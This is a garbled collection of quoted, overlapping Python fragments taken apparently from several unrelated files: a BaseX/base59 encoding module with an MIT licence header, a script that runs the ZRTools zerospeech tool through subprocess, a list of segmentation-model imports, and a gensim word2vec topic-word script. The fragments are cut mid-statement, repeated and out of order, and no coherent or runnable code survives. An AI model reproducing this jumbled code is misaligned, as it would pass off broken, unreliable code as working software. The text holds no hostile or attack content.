v.decode('ascii') decimal", "any person obtaining a copy # of this software and associated documentation files", "# # The above copyright notice and this permission notice shall be included", "\"Software\"), to deal # in the Software without restriction, including without limitation the", "str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if", "x = i else: self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode an", "or decode FILE, or standard input, to standard output.\"\"\" import sys import argparse", "len(string) sum_chk += sumsz + sumsz / self.base return string, sum_chk % self.base", "copyright notice and this permission notice shall be included in # all copies", "AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE", "IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED,", "= 0 while i: i, idx = divmod(i, self.base) string = self.alphabet[idx] +", "a copy # of this software and associated documentation files (the \"Software\"), to", "deal # in the Software without restriction, including without limitation the rights #", "OTHER DEALINGS IN # THE SOFTWARE. 
# \"\"\" BaseX encoding \"\"\" __version__ =", "using BaseX\"\"\" if not i and default_one: return self.alphabet[0] string = \"\" sum_chk", "sum_chk = 0 while i: i, idx = divmod(i, self.base) string = self.alphabet[idx]", "< 0: continue if chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk", "default_one: return self.alphabet[0] string = \"\" sum_chk = 0 while i: i, idx", "string = \"\" sum_chk = 0 while i: i, idx = divmod(i, self.base)", "self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base)) % self.base return result", "i sumsz += 1 sum_chk += sumsz + sumsz / self.base return decimal,", "sum_chk += i sumsz += 1 sum_chk += sumsz + sumsz / self.base", "AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #", "(the \"Software\"), to deal # in the Software without restriction, including without limitation", "IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR", "p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk", "distribute, sublicense, and/or sell # copies of the Software, and to permit persons", "0 sum_chk = 0 sumsz = 0 for char in v: o =", "import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'),", "self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if", "charge, to any person obtaining a copy # of this software and associated", "v): \"\"\"Decode a BaseX encoded string as an integer\"\"\" if not isinstance(v, str):", "if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not '%s'\" %", "p, acc = 1, 0 for c in map(ord, reversed(v)): acc += p", "if chk < 0: continue if chk >= self.base: raise ValueError(\"Invalid character\") break", "WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO", "action='store_true', help='append a checksum before encoding') args = parser.parse_args() fun = { (False,", "i, idx = divmod(i, self.base) string = self.alphabet[idx] + string sum_chk += idx", "decimal * self.base + i sum_chk += i sumsz += 1 sum_chk +=", "WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO", "= b59.encode def main(): \"\"\"BaseX encode or decode FILE, or standard input, to", "ord(a) self.decoder[o] = i x = -1 for a in self.translate: o =", "WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED", "KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF", "__init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet) self.decoder", "to whom the Software is # furnished to do so, subject to the", "limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or", "sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = []", "help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding') args =", "* 256 for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i", "COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER", "sum_chk = (self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 =", "OR OTHER DEALINGS IN # THE SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__", "BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate self.base =", "o = ord(a) i = self.decoder[o] if i < self.base: x = i", "for BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk", "% type(v).__name__) p, acc = 1, 0 for c in map(ord, reversed(v)): acc", "copies or substantial portions of the Software. 
# # THE SOFTWARE IS PROVIDED", "in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x = -1 for a", "or standard input, to standard output.\"\"\" import sys import argparse stdout = sys.stdout", "sum_chk += idx sumsz = len(string) sum_chk += sumsz + sumsz / self.base", "= self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue if chk >=", "portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT", "do so, subject to the following conditions: # # The above copyright notice", "= 0 for char in v: o = ord(char) i = self.decoder[o] if", "SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self,", "action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding') args", "chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue if chk", "\"\"\"Encode an integer using BaseX\"\"\" if not i and default_one: return self.alphabet[0] string", "args = parser.parse_args() fun = { (False, False): b59encode, (True, False): b59decode, }[(args.decode,", "(True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except", "THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR", "character\") decimal = decimal * self.base + i sum_chk += i sumsz +=", "THE USE OR OTHER DEALINGS IN # THE SOFTWARE. 
# \"\"\" BaseX encoding", "break acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise", "+ self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string as an integer\"\"\"", "permit persons to whom the Software is # furnished to do so, subject", "v = v[:-1] if chk < 0: continue if chk >= self.base: raise", "Permission is hereby granted, free of charge, to any person obtaining a copy", "return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\"", "v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if not isinstance(v, str): v", "% self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode =", "self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def main():", "THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR", "IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT", "EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,", "Software without restriction, including without limitation the rights # to use, copy, modify,", "= v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base))", "b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or decode FILE, or standard", "parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true',", "'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c',", "= i else: self.decoder[o] = x def encode_int(self, i, 
default_one=True): \"\"\"Encode an integer", "in v: o = ord(char) i = self.decoder[o] if i < 0: continue", "string sum_chk += idx sumsz = len(string) sum_chk += sumsz + sumsz /", "\"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while", "self.decoder[o] if i < self.base: x = i else: self.decoder[o] = x def", "= len(string) sum_chk += sumsz + sumsz / self.base return string, sum_chk %", "# The above copyright notice and this permission notice shall be included in", "8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base))", "# of this software and associated documentation files (the \"Software\"), to deal #", "'0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate", "OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR", "string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])]", "fun = { (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data =", "CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE", "sell # copies of the Software, and to permit persons to whom the", "substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\",", "0: continue if chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk =", "FILE, or standard input, to standard output.\"\"\" import sys import argparse stdout =", "a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x = -1 for", "(sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode =", "# all copies or substantial portions of the Software. 
# # THE SOFTWARE", "= [self.base] * 256 for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o]", "return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\"", "if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk =", "= sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d',", "= parser.parse_args() fun = { (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)]", "restriction, including without limitation the rights # to use, copy, modify, merge, publish,", "= BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode", "+= 1 sum_chk += sumsz + sumsz / self.base return decimal, sum_chk %", "object is required, not '%s'\" % type(v).__name__) p, acc = 1, 0 for", "FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS", "sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?',", "= self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk]", "# # Permission is hereby granted, free of charge, to any person obtaining", "all copies or substantial portions of the Software. # # THE SOFTWARE IS", "class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate self.base", "DEALINGS IN # THE SOFTWARE. 
# \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1'", "= self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base)) % self.base return", "sumsz += 1 sum_chk += sumsz + sumsz / self.base return decimal, sum_chk", "BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR", "sumsz = len(string) sum_chk += sumsz + sumsz / self.base return string, sum_chk", "v.decode('ascii') decimal = 0 sum_chk = 0 sumsz = 0 for char in", "= args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e: sys.exit(e) if not", "SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # \"\"\"", "* c p = p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk", "# Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission is", "FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE", "OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT", "# # Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. 
# # Permission", "PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING", "continue if i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base", "before encoding') args = parser.parse_args() fun = { (False, False): b59encode, (True, False):", "if not isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk = 0", "= { (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n')", "files (the \"Software\"), to deal # in the Software without restriction, including without", "# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS", "< self.base: x = i else: self.decoder[o] = x def encode_int(self, i, default_one=True):", "+ string sum_chk += idx sumsz = len(string) sum_chk += sumsz + sumsz", "BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk =", "+= chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = [] while", "% self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v,", "self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue if chk >= self.base:", "8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX encoded", "BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or", "b59encode = b59.encode def main(): \"\"\"BaseX encode or decode FILE, or standard input,", "nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true',", "the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell", "i = self.decoder[o] if i < 0: continue if i >= self.base: raise", "self.base return self.alphabet[sum_chk] b59 = 
BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode", "raise ValueError(\"Invalid character\") decimal = decimal * self.base + i sum_chk += i", "following conditions: # # The above copyright notice and this permission notice shall", "if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc", "of the Software, and to permit persons to whom the Software is #", "v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii')", "encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i and default_one:", "= -1 for a in self.translate: o = ord(a) i = self.decoder[o] if", "o = ord(a) self.decoder[o] = i x = -1 for a in self.translate:", "standard input, to standard output.\"\"\" import sys import argparse stdout = sys.stdout parser", "encode or decode FILE, or standard input, to standard output.\"\"\" import sys import", "if not i and default_one: return self.alphabet[0] string = \"\" sum_chk = 0", "The above copyright notice and this permission notice shall be included in #", "IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR", "fun(data) except Exception as e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii')", "in map(ord, reversed(v)): acc += p * c p = p << 8", "% self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a", "ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk %", "self.decoder[o] if i < 0: continue if i >= self.base: raise ValueError(\"Invalid character\")", "<gh_stars>100-1000 # # Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. 
# #", "OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER", "HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN", "including without limitation the rights # to use, copy, modify, merge, publish, distribute,", "encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v)", "= (self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN',", "checksum before encoding') args = parser.parse_args() fun = { (False, False): b59encode, (True,", "parser.parse_args() fun = { (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data", "return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string as", "= '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate =", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER", "associated documentation files (the \"Software\"), to deal # in the Software without restriction,", "+ sumsz / self.base return string, sum_chk % self.base def encode(self, v): \"\"\"Encode", "= len(self.alphabet) self.decoder = [self.base] * 256 for i, a in enumerate(self.alphabet): o", "chk < 0: continue if chk >= self.base: raise ValueError(\"Invalid character\") break acc,", "hereby granted, free of charge, to any person obtaining a copy # of", "of this software and associated documentation files (the \"Software\"), to deal # in", "OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS", "sumsz = 0 for char in v: o = ord(char) i = self.decoder[o]", "\"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet", "256 for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x", "BaseX\"\"\" if not i and default_one: return self.alphabet[0] string = \"\" sum_chk =", "0: continue if 
i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal *", "# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,", "v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk", "def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i and", "self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base + i sum_chk +=", "notice shall be included in # all copies or substantial portions of the", "alphabet, translate): self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet) self.decoder =", "a BaseX encoded string as an integer\"\"\" if not isinstance(v, str): v =", "NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY", "raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc & 0xff) acc >>=", "= v[:-1] if chk < 0: continue if chk >= self.base: raise ValueError(\"Invalid", "# \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet,", "= divmod(i, self.base) string = self.alphabet[idx] + string sum_chk += idx sumsz =", "help='append a checksum before encoding') args = parser.parse_args() fun = { (False, False):", "to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of", "(self.base - (sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self,", "decimal = 0 sum_chk = 0 sumsz = 0 for char in v:", "the Software is # furnished to do so, subject to the following conditions:", "subject to the following conditions: # # The above copyright notice and this", "main(): \"\"\"BaseX encode or decode FILE, or standard input, to standard output.\"\"\" import", "self.base: x = i else: self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode" ]
[ "subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l',", "__name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str,", "argparse import sys from os.path import join from os import chdir import subprocess", "== '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='')", "type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args()", "argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools')", "'--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args =", "import argparse import sys from os.path import join from os import chdir import", "type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc {} {}'.format(args.sge,args.filelist) print(command) subprocess.call(command.split())", "sys from os.path import join from os import chdir import subprocess if __name__", "'--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc {} {}'.format(args.sge,args.filelist) print(command)", "from os import chdir import 
subprocess if __name__ == '__main__': parser = argparse.ArgumentParser()", "parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command", "'__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root',", "parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args", "default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc {}", "os.path import join from os import chdir import subprocess if __name__ == '__main__':", "import chdir import subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge',", "default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root)", "parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc {} {}'.format(args.sge,args.filelist)", "chdir import subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str,", "os import chdir import subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s',", "import sys from os.path import join from os import 
chdir import subprocess if", "= argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str,", "import subprocess if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge')", "from os.path import join from os import chdir import subprocess if __name__ ==", "type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command = './run_disc", "import join from os import chdir import subprocess if __name__ == '__main__': parser", "join from os import chdir import subprocess if __name__ == '__main__': parser =", "if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist',", "'--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root', type=str, default='/home/korhan/Desktop/zerospeech2017/track2/src/ZRTools') args = parser.parse_args() chdir(args.zr_root) command =", "parser = argparse.ArgumentParser() parser.add_argument('-s', '--sge', type=str, default='nosge') parser.add_argument('-l', '--filelist', type=str, default='') parser.add_argument('-zr_root', '--zr_root'," ]
[ "from .fcnmodel import * from .gcnmodel import * from .linknetmodel import * from", "* from .fcnmodel import * from .gcnmodel import * from .linknetmodel import *", "* from .deeplab_v2_multiscale import * from .deeplab_vggmodel import * from .dilatedmodel import *", "from .deeplab_v2_multiscale import * from .deeplab_vggmodel import * from .dilatedmodel import * from", ".fcnmodel import * from .gcnmodel import * from .linknetmodel import * from .segnetmodel", "import * from .ducmodel import * from .fcnmodel import * from .gcnmodel import", ".gcnmodel import * from .linknetmodel import * from .segnetmodel import * from .tiramisu", "from .deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel import * from", "import * from .dilatedmodel import * from .ducmodel import * from .fcnmodel import", ".deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel import * from .fcnmodel", "from .deconvnetmodel import * from .deeplab_v2 import * from .deeplab_v2_multiscale import * from", "import * from .gcnmodel import * from .linknetmodel import * from .segnetmodel import", "import * from .linknetmodel import * from .segnetmodel import * from .tiramisu import", "* from .ducmodel import * from .fcnmodel import * from .gcnmodel import *", ".deeplab_v2_multiscale import * from .deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel", "* from .gcnmodel import * from .linknetmodel import * from .segnetmodel import *", "import * from .deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel import", "import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel import * from .dilatedmodel import", "from .dilatedmodel import * from .ducmodel import * from .fcnmodel import * from", "from .gcnmodel import * from .linknetmodel import * from .segnetmodel import * from", "* from .deeplab_vggmodel import * from .dilatedmodel import * from .ducmodel import *", ".deeplab_v2 import * from .deeplab_v2_multiscale import * from 
.deeplab_vggmodel import * from .dilatedmodel", "from .linknetmodel import * from .segnetmodel import * from .tiramisu import * from", ".deconvnetmodel import * from .deeplab_v2 import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel", "* from .dilatedmodel import * from .ducmodel import * from .fcnmodel import *", ".dilatedmodel import * from .ducmodel import * from .fcnmodel import * from .gcnmodel", ".ducmodel import * from .fcnmodel import * from .gcnmodel import * from .linknetmodel", "from .ducmodel import * from .fcnmodel import * from .gcnmodel import * from", "* from .segnetmodel import * from .tiramisu import * from .tiramisu_nobias import *", "* from .linknetmodel import * from .segnetmodel import * from .tiramisu import *", ".linknetmodel import * from .segnetmodel import * from .tiramisu import * from .tiramisu_nobias", "* from .deeplab_v2 import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel import *", "import * from .deeplab_v2 import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel import", "import * from .fcnmodel import * from .gcnmodel import * from .linknetmodel import", "import * from .segnetmodel import * from .tiramisu import * from .tiramisu_nobias import", "from .deeplab_v2 import * from .deeplab_v2_multiscale import * from .deeplab_vggmodel import * from" ]
[ "from gensim.models import word2vec from gensim.models import KeyedVectors from operator import itemgetter filePath", "topic word set wordFreq = {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split(", "try: similarWords = model.most_similar(word, topn=10) for idx, similarWord in enumerate(similarWords): if similarWord[0] not", "word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word) if", "word set wordFreq = {} for i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( )", "for line in fileTrainRaw: fileTrainRead.append(line) #load the pre-trained word2vec vector set model =", "#predict for each word and then calculate the most frequent topic word set", "calculate the most frequent topic word set wordFreq = {} for i in", "fileTrainRead[i][0].split( ) for j, word in enumerate(words): # word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) #", "top10Words = [k for k in sorted(wordFreq.items(), key=itemgetter(1), reverse=True)[:10]] for _, word in", "operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the file by", "i in range(len(fileTrainRead)): words = fileTrainRead[i][0].split( ) for j, word in enumerate(words): #", "KeyedVectors from operator import itemgetter filePath = '/home/ubuntu/danmu/corpusSegRecentWords.txt' fileTrainRead = [] #read the", "fileTrainRead = [] #read the file by line with open(filePath) as fileTrainRaw: for", "# word = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()]+\".decode(\"utf8\"), \"\",word) # word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = re.sub(\"!,❤。~《》:()【】「」?”“;:、\".decode(\"utf8\"),\"\",word)", "# word = re.sub(\"[【】╮╯▽╰╭★→「」]+\".decode(\"utf8\"),\"\",word) # word = 
